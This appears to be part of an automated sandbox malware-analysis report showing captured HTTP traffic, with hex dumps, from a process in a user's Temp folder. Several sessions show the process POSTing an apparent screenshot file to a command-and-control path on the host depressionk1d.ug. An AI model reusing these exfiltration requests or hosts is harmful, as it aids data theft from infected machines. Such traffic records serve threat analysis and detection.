                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                ETag: "5a4b7cd2-4ce"
                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                                                                                                                                                                                Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                                                                                                                                                                                Nov 11, 2021 12:27:27.295025110 CET27001OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:27.295058966 CET27006OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:27.295156002 CET27012OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:27.295237064 CET27021OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:27.320391893 CET27032OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:27:27.320453882 CET27037OUTData Raw: 50 f8 88 aa 78 ee c5 27 24 50 22 5f 4a 7e 29 45 72 f2 a3 d2 bb 24 ba ba bb bf f2 7e db 79 71 72 20 8c 45 08 9a 56 7f 2d 07 45 5c 9e 07 b0 a8 44 4a 0e 40 e6 9d 46 68 51 48 39 98 d1 1a 83 c5 2f 94 98 e9 4e a2 9d 90 ae c6 79 29 e9 4b e5 21 ed 4f a5
                                                                                                                                                                                Data Ascii: Px'$P"_J~)Er$~yqr EV-E\DJ@FhQH9/Ny)K!Obr*ZAKT[$JcOT+3g9Sc4r2?"34EU(QHWc)@?>9Wa1h$Z\ii^iiE(SJ:wzviIIKM\)AJNaM)i\b
                                                                                                                                                                                Nov 11, 2021 12:27:27.320475101 CET27042OUTData Raw: e5 74 51 5d 0d b4 ab a3 78 56 df 54 b6 b4 b5 9e f6 ee f6 5b 66 96 ea 04 9d 20 44 54 60 02 38 2b b9 b7 9e 48 27 0b c6 39 af 22 52 e5 57 3e 8a 31 e6 76 39 fa 5c b6 31 93 83 ce 2b b0 f0 e6 ad 2c 10 5f 6b 37 fa 7e 8e da 5d a1 2c 61 7d 32 dd be d1 70
                                                                                                                                                                                Data Ascii: tQ]xVT[f DT`8+H'9"RW>1v9\1+,_k7~],a}2pY)Tcyc5Ku24Pmzb]K;[Jrt]F+FH,AyCmryd{$s:jq$S5t2BOA&~?zjr


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                45192.168.2.549863178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:28.071530104 CET27072OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----cd9bcadf274a423ef14786be70bb2f2c
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94395
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:28.072115898 CET27072OUTData Raw: 2d 2d 2d 2d 2d 2d 63 64 39 62 63 61 64 66 32 37 34 61 34 32 33 65 66 31 34 37 38 36 62 65 37 30 62 62 32 66 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------cd9bcadf274a423ef14786be70bb2f2cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:28.073148012 CET27082OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:28.073410988 CET27085OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:28.096921921 CET27086INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:28 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 1230
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                ETag: "5a4b7cd2-4ce"
                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                                                                                                                                                                                Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                                                                                                                                                                                Nov 11, 2021 12:27:28.098507881 CET27089OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:28.098555088 CET27095OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:27:28.098586082 CET27100OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:27:28.098627090 CET27109OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:27:28.126363993 CET27141OUTData Raw: 35 96 54 92 53 7e 67 a5 99 dd d4 82 7d 8f 4f 8b 8f 87 76 7f 85 72 d2 e4 93 5d 52 a9 3f 0f ac 47 ae 2b 99 96 22 7d 73 46 0d ab cf d5 9c d9 ac 1b e5 b7 64 54 a2 9e 51 85 37 04 76 af 45 34 cf 05 c5 ad c4 a2 8a 29 88 5a 29 29 40 a0 07 a8 1d a9 e3 ef
                                                                                                                                                                                Data Ascii: 5TS~g}Ovr]R?G+"}sFdTQ7vE4)Z))@QIUp}6mOzRs<T3(1RhfJQc#ho SSGZp5r%Y9nSI{8=/frhwDj=jQ+kQygSaTe{
                                                                                                                                                                                Nov 11, 2021 12:27:28.126782894 CET27157OUTData Raw: 41 66 e4 0e 59 b9 fc 48 fc 2a a1 d4 ed ad 21 0b 36 9f a7 dc c8 32 5a 56 98 65 c9 39 27 94 3f 96 6b d0 85 2d 6c a3 73 cf 95 4d 2e e5 62 d4 1a c6 a1 33 10 35 28 9b 0a ce 70 a5 78 03 27 ac 38 ad fd 12 ea 7b bb 69 1e 76 2d 89 30 a5 80 07 18 19 ce 00
                                                                                                                                                                                Data Ascii: AfYH*!62ZVe9'?k-lsM.b35(px'8{iv-0s\*_@8Tg~< &H$uSB;X,(NMW#P|E>`nH9jK/.wr&xSjb)rwwV)%"wBH8u#


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                46192.168.2.549864178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:29.259401083 CET27159OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----cd9bcadf274a423ef14786be70bb2f2c
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94395
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:29.259869099 CET27159OUTData Raw: 2d 2d 2d 2d 2d 2d 63 64 39 62 63 61 64 66 32 37 34 61 34 32 33 65 66 31 34 37 38 36 62 65 37 30 62 62 32 66 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------cd9bcadf274a423ef14786be70bb2f2cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:29.260319948 CET27169OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:29.260720015 CET27172OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:29.284523964 CET27173INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:29 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 1230
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                ETag: "5a4b7cd2-4ce"
                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 